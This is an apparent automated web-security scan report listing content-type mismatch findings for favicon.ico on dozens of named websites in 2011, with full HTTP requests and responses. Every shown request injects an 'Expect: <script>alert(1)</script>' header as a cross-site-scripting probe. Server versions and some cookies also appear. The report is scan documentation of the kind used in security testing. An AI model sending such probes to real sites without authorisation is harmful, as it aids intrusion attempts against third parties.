Solvang, CA. 93463
Phone 1-888 MEDSEEK
email info@medseek.com
htt
...[SNIP]...

31.17. http://www.affordablevintagejewelry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.affordablevintagejewelry.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.affordablevintagejewelry.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:45:15 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.18. http://www.agilone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.agilone.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.agilone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:55:04 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

31.19. http://www.alarabiya.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alarabiya.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alarabiya.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:20 GMT
Expires: Wed, 04 May 2011 01:24:20 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 08:40:24 GMT
ETag: "3e3800f-13e-4a25b1754ce00"
Accept-Ranges: bytes
Content-Length: 318
Cache-Control: max-age=300, must-revalidate
Content-Type: text/plain; charset=UTF-8
Age: 201
X-Cache: HIT from 12.120.9.85
Via: 1.1 12.120.9.85:80 (cache/2.6.2.3.13.ATT)
Connection: keep-alive

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

31.20. http://www.allgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allgame.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 15:39:20 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 23 Jun 2009 02:38:02 GMT
ETag: "180922-47e-46cfae1289680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Age: 43249
X-Cache: HIT from tul-2
Connection: keep-alive

............ .h.......(....... ..... .............................v.umv.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u\v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.v.u.s.
...[SNIP]...

31.21. http://www.allslotsusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allslotsusa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allslotsusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:05:49 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 45

The requested file favicon.ico was not found.

31.22. http://www.apartmentwiz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apartmentwiz.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentwiz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:52:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.23. http://www.apogee.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apogee.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apogee.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:59:04 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.24. http://www.architecturaldesigns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.architecturaldesigns.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.architecturaldesigns.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:08:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.25. http://www.armedservicesjobs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.armedservicesjobs.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.armedservicesjobs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:50:34 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.26. http://www.ashvillemobilehomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ashvillemobilehomes.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashvillemobilehomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:44:11 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.27. http://www.asstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.asstatic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.asstatic.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 04 May 2011 01:24:45 GMT
Connection: close
Content-Length: 39

<h1>Bad Request (Invalid Hostname)</h1>

31.28. http://www.autoinsurancetips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.autoinsurancetips.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autoinsurancetips.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Wed, 04 May 2011 01:22:51 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 45

The requested file favicon.ico was not found.

31.29. http://www.azdventuresbooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.azdventuresbooks.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azdventuresbooks.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Unknown
Content-Type: text/html
Date: Wed, 04 May 2011 01:44:39 GMT
Content-Length: 60
Set-Cookie: 7s51872mp2=805470218.20480.0000; path=/
Connection: close

The page cannot be displayed because the expectation failed.

31.30. http://www.azkidsnet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.azkidsnet.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.azkidsnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:29:13 GMT
Server: Rapidsite/Apa/1.3.33 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.22 OpenSSL/0.9.8d
Content-Type: text/html; charset=iso-8859-1
Content-Length: 20

HTTP Error Code 417"

31.31. http://www.bedbathstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bedbathstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bedbathstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:06:57 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.32. http://www.bettycrockerstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bettycrockerstore.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bettycrockerstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
P3P: CP="CAO DSP COR CURa ADMi DEVi OUR BUS UNI STA", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:19:41 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.33. http://www.bigotires.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bigotires.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigotires.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:22:14 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.34. http://www.biz-stay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.biz-stay.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biz-stay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:09:00 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.35. http://www.blackdoctor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blackdoctor.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackdoctor.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:58:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.36. http://www.blackforestdecor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.blackforestdecor.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackforestdecor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:59:42 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.37. http://www.bluebeat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bluebeat.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluebeat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 04 May 2011 04:12:16 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Thu, 08 Apr 2010 23:01:45 GMT
ETag: "2128c32-74e6-483c1a9a60840"
Accept-Ranges: bytes
Content-Length: 29926

..............(....................... ..............00......h...............h...&.................. ..........V...00...........!........ .h....0........ ..    ...5.. .... ......>..00.... ..%..>O..(.
...[SNIP]...

31.38. http://www.bollywoodhungama.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bollywoodhungama.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bollywoodhungama.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 22 Apr 2009 14:10:58 GMT
ETag: "d903ed-47e-46825551ec080"
Content-Type: text/plain; charset=UTF-8
Date: Wed, 04 May 2011 03:05:11 GMT
Content-Length: 1150
Connection: close

............ .h.......(....... ..... .....@...................g}_B\...e...P.s.................................................+...b...I...&r...6vy............................................A.s.p...Q.
...[SNIP]...

31.39. http://www.bonati.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bonati.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bonati.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:29:20 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.40. http://www.bongotones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bongotones.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bongotones.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:30:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.41. http://www.bootbay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bootbay.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bootbay.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Set-Cookie: .ASPXANONYMOUS=9NJ2eaZHzgEkAAAAMTUwODQwMzAtZGMwNS00NzQwLWJkODItNDJiYTc2OWNjZTE30Pxx8KUnlwQvi3xFVHH21Necx901; expires=Fri, 03-May-2013 02:32:36 GMT; path=/; HttpOnly
X-UA-Compatible: IE=EmulateIE7
Server: lighttpd/2.0.0
Date: Wed, 04 May 2011 02:32:36 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

31.42. http://www.brandsmartusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.brandsmartusa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brandsmartusa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:14:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.43. http://www.brighamandwomens.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.brighamandwomens.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brighamandwomens.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:57:21 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.44. http://www.brisksearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.brisksearch.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brisksearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:48:55 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.45. http://www.bullguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.bullguard.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bullguard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-UA-Compatible: IE=8
Date: Wed, 04 May 2011 01:31:07 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.46. http://www.cabinsforyou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cabinsforyou.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cabinsforyou.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:46 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.47. http://www.cafepress.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cafepress.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cafepress.co.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
CP: LVW20
Content-Length: 60
Date: Wed, 04 May 2011 03:01:19 GMT
Connection: close

The page cannot be displayed because the expectation failed.

31.48. http://www.ccc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccc.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ccc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:07:27 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.49. http://www.cedarfair.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cedarfair.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cedarfair.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:21:20 GMT
Content-Length: 37

Sorry, you have experienced an error.

31.50. http://www.celebsquares.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.celebsquares.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebsquares.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
Date: Wed, 04 May 2011 01:06:38 GMT
Content-Length: 60
Set-Cookie: BIGipServerpool-74.205.17.3=2030151872.0.0000; path=/

The page cannot be displayed because the expectation failed.

31.51. http://www.chaoticgame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chaoticgame.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaoticgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:48:19 GMT
Content-Length: 60
Set-Cookie: BIGipServerwww2.chaoticgame.com_pool=2738080010.20480.0000; path=/

The page cannot be displayed because the expectation failed.

31.52. http://www.chaparral-racing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chaparral-racing.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chaparral-racing.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:30:56 GMT
Content-Length: 60
Set-Cookie: BNI__Chap_HTTP=1002120a00005000; Path=/; Max-age=3600

The page cannot be displayed because the expectation failed.

31.53. http://www.chefsresource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.chefsresource.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chefsresource.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 03:45:16 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.54. http://www.cherokee.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cherokee.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

